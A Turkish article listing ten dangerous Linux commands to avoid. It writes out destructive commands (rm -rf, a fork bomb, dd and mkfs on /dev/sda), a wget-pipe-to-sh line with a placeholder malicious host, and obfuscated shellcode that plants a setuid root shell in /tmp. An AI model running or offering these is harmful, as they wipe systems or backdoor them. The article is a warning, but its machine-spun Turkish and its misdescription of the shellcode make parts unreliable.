Найти тему

Asla Kullanmamanız Gereken 10 Tehlikeli Linux Komutu

Daha evvel Linux işletim sistemi kullandıysanız, platformun Windows'tan daha bağımsız olduğunu biliyorsunuzdur. Linux açık asıllı bir işletim sistemi ve kullanıcılara farklı süreçler gerçekleştirme konusunda ehliyetli özgürlüğü sağlıyor. Ancak Linux, birinci kere kullananlar için bir o kadar da çekişmeli bir sistem olabilir.

Tıpkı Windows'ta olduğu üzere Linux'ta da farklı süreçleri gerçekleştirmek için kullanabileceğiniz birçok terminal komutu var. Ancak Windows'un tersine, Linux, sisteminize zarar verebilecek rastgele bir komut çalıştırıp çalıştırmadığınızı onaylamanızı istemiyor. Bu nedenle, aşağıdaki komutlardan kaçınmanızı öneririz.

İşte kullanmanızı önermediğimiz en tehlikeli 10 Linux terminal komutu:

1. rm -rf

rm -rf komutu, bir klasörü ve içeriğini silmek için en süratli yollardan biri. Lakin küçük bir yazım cürmü yahut bilgisizlik, işletim sisteminizde geri dönüşü olmayan bir hasara neden olabilir. rm komutuyla kullanılan seçeneklerden kimileri, rm -r komutunda olduğu üzere, klasörü olduğu üzere siler. Velev boş klasörü bile siler. rm -f komutu da salt okunur evrakları ve kök dizinde bulunan tüm evrakları silebilir.

2. : () {: |: &} ;:

Yukarıdaki komut aslında bir fork bomb saldırısı. Ön planda ve art planda bir kere olmak üzere iki sefer çağrılan bir fonksiyon tanımlayarak çalışır. Basitçe komutu açıklamak gerekirse; :() ile bir fonksiyon tanımlanır, |: ile fonksiyon kendi içinden çağırılır ve & ile arkaplanda çalışması sağlanır, ; fonksiyonu sonlandırır ve : ile fonksiyon çağırılır. Sistem donuncaya kadar tekrar tekrar çalışmaya devam eder.

3. command> / dev / sda

Yukarıdaki komut, / dev / sda dizinine komutun çıktısını müellif. Komut işlenmemiş doneleri müellif ve dizindeki tüm belgeler işlenmemiş donelerle değiştirilir. Böylece blokta yekun data kaybı olur.

4. mv directory / dev / null

Bu komut temel olarak tüm belgeleri / dev / null dizinine taşır. Evet, gayri bir deyişle tüm evrakların sistemden kaldırılması manasına gelir.

-2

5. wget http: // malicious_source -O | sh

Yukarıdaki komut, beğenilmeyen hedefli bir asıldan komut evrakı indirir ve daha sonra sisteminizde çalıştırır. wget komutu belgeyi indirecek ve sh komutu ise indirilen belgeyi sisteminizde açacaktır.

6. Mkfs.ext3 / dev / sda

Bu komut ise sırf 'sda' bloğunu biçimlendirir ve yukarıdaki komutu çalıştırdıktan sonra sabit disk sürücünüzün sıfırlanacağını bilmelisiniz. Veriler silinince sistem kurtarılamaz halde kalır.

7. > File

> File komutu belge içeriğini hür bırakmak için kullanılır. Şayet bir yazım yanlışı yahut yanlışlık sonucu > xt.conf olarak yürütülürse, yapılandırma evrakını yahut farklı bir sistem dosyasını yazabilir.

8. ^ foo ^ bar

Bu komut, tüm komutu tekrar yazmanıza gerek kalmadan evvelki komutu düzenlemek için kullanılır. Ancak komutu kullanarak evvelki komuttaki değişikliği dikkatlice denetim etmezseniz risk alırsınız ve hakikaten dertli olabilir.

9. dd if = / dev / random of = / dev / sda

Yukarıdaki komutu / dev / sda olarak bitirirseniz ve blok için rastgele olgu yazacaktır. Olağan ki bunun sonucunda sisteminiz tutarsız ve kurtarılamaz bir noktaya gelecek.

10. Görünmez Komutlar

Aşağıdaki komut, aslında bu metindeki birinci komuttan (rm-rf) öbür bir şey değil. Kodu terminale yazmanız halinde kök dizini tertemiz yapar çıkarsınız. Aslında tehdidin gizlenebileceğini ve bazen bazen tespit edilemeyeceğini gösteriyor. Ne yaptığınızı ve sonucun ne olacağını bilemezsiniz. Bilinmeyen bir asıldan kod derleme / çalıştırma yapmayın.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;